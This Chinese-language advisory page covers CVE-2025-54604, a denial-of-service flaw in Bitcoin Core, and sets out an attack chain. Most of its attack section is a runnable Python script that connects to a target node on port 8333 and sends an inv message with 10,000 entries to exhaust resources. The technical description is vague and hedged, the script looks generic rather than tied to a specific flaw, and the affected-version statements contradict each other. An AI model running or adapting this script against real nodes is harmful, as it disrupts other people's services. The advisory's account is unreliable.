CVE-2025-54604: Bitcoin Core 29.0及之前版本不受控制的资源消耗漏洞

漏洞信息

漏洞编号

CVE-2025-54604

漏洞类型

不受控制的资源消耗（Uncontrolled Resource Consumption）/拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Bitcoin Core

漏洞概述

Bitcoin Core是比特币网络的核心客户端软件，实现了比特币协议的完整节点功能。CVE-2025-54604是Bitcoin Core 29.0及之前版本中存在的一个不受控制的资源消耗漏洞（Uncontrolled Resource Consumption）。该漏洞允许攻击者通过精心构造的输入或交易数据，导致受影响节点消耗过多系统资源（包括CPU、内存、网络带宽等），最终可能导致节点服务中断或拒绝服务攻击。由于比特币网络去中心化的特性，攻击者可以同时对多个节点发起攻击，对整个网络的稳定性和可用性造成严重影响。该漏洞属于Bitcoin Core披露的2个相关资源消耗问题中的第一个。此漏洞无需认证即可利用，攻击复杂度低，且对可用性有高影响，属于高危安全漏洞。攻击者可以利用此漏洞使比特币全节点无法正常处理区块和交易，干扰网络共识过程。

技术细节

该漏洞属于资源消耗类拒绝服务漏洞。在Bitcoin Core的实现中，当处理特定类型的交易或消息时，系统未能正确限制资源使用量。攻击者可以构造包含大量输入数据或复杂计算逻辑的交易，使节点在验证和处理这些数据时消耗大量CPU和内存资源。CVSS 3.1评分显示该漏洞可通过网络远程利用（AV:N），攻击复杂度低（AC:L），无需任何权限（PR:N）和用户交互（UI:N）。可用性影响为高（H），意味着攻击成功后将导致目标节点服务不可用。攻击者可能利用比特币P2P网络协议，向节点发送精心构造的inv消息、tx消息或区块数据，触发大量计算密集型操作。由于比特币节点需要持续同步和验证交易数据，攻击者可以持续发送恶意数据流，使节点陷入资源耗尽状态。此外，该漏洞可能被用于对比特币网络进行女巫攻击（Sybil Attack），通过控制大量存在资源消耗漏洞的节点来干扰网络共识。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描比特币网络，发现运行Bitcoin Core的节点及其版本号，识别是否存在CVE-2025-54604漏洞

STEP 2

步骤2: 建立连接

攻击者通过TCP连接到目标节点的8333端口（P2P协议端口），发送版本握手消息与节点建立P2P连接

STEP 3

步骤3: 发送恶意数据

攻击者构造包含大量数据项的恶意消息（如大量inventory条目、畸形交易数据），发送给目标节点触发资源消耗

STEP 4

步骤4: 资源耗尽

目标节点在处理恶意数据时消耗大量CPU和内存资源，由于缺乏有效的资源限制机制，导致系统资源耗尽

STEP 5

步骤5: 服务中断

节点无法正常处理正常的区块同步和交易验证请求，服务可用性受到严重影响，可能导致节点崩溃或无响应

STEP 6

步骤6: 网络影响

如果攻击规模化实施，大量节点同时遭受资源消耗攻击，将影响比特币网络的整体稳定性和去中心化特性

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54604 Bitcoin Core Uncontrolled Resource Consumption PoC
# This PoC demonstrates resource exhaustion attack vector
# Note: This is for educational and research purposes only

import socket
import time
import struct

def create_malicious_message():
    """Generate malicious P2P message to trigger resource consumption"""
    # Magic bytes for Bitcoin mainnet
    magic = b'\xf9\xbe\xb4\xd9'
    
    # Command: inv (inventory)
    command = b'inv                    '[:12]
    
    # Create inventory message with many items
    count = varint(10000)  # Large number of inventory items
    inv_type = struct.pack('<I', 1)  # MSG_TX
    inv_hash = b'\x00' * 32  # Fake tx hash
    
    inventory = count + (inv_type + inv_hash) * 10000
    
    # Calculate payload length and checksum
    payload = inventory
    length = struct.pack('<I', len(payload))
    checksum = hash256(payload)[:4]
    
    return magic + command + length + checksum + payload

def varint(n):
    """Encode integer as Bitcoin varint"""
    if n < 0xfd:
        return bytes([n])
    elif n < 0x10000:
        return b'\xfd' + struct.pack('<H', n)
    elif n < 0x100000000:
        return b'\xfe' + struct.pack('<I', n)
    else:
        return b'\xff' + struct.pack('<Q', n)

def hash256(data):
    """Double SHA256 hash"""
    import hashlib
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def exploit(target_host, target_port=8333):
    """Connect to Bitcoin node and send malicious message"""
    print(f"[*] Connecting to {target_host}:{target_port}")
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    
    try:
        sock.connect((target_host, target_port))
        print("[+] Connected successfully")
        
        # Send version message first
        version_msg = create_version_message()
        sock.send(version_msg)
        print("[*] Sent version message")
        
        time.sleep(1)
        
        # Send malicious inv message
        malicious_msg = create_malicious_message()
        sock.send(malicious_msg)
        print("[*] Sent malicious inv message")
        print("[+] Resource exhaustion attack initiated")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

def create_version_message():
    """Create a basic Bitcoin version message"""
    magic = b'\xf9\xbe\xb4\xd9'
    command = b'version              '[:12]
    
    # Simplified version message payload
    payload = struct.pack('<I', 70015)  # Protocol version
    payload += struct.pack('<Q', 0)  # Services
    payload += struct.pack('<Q', int(time.time()))  # Timestamp
    payload += b'\x00' * 26  # Remote address
    payload += b'\x00' * 26  # Local address
    payload += b'\x00' * 8  # Nonce
    payload += varint(0)  # User agent length
    payload += struct.pack('<I', 0)  # Start height
    payload += b'\x01'  # Relay
    
    length = struct.pack('<I', len(payload))
    checksum = hash256(payload)[:4]
    
    return magic + command + length + checksum + payload

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

影响范围

Bitcoin Core < 29.0

Bitcoin Core 29.0及所有更早版本

防御指南

临时缓解措施

立即将Bitcoin Core升级到官方发布的安全修复版本。在升级前，可以通过配置防火墙规则限制P2P端口8333的访问源，仅允许来自可信节点的连接。同时监控节点资源使用情况，设置CPU和内存使用上限告警。考虑临时降低maxconnections参数，减少潜在的攻击面。对于关键业务节点，建议部署多个冗余节点以保证服务连续性。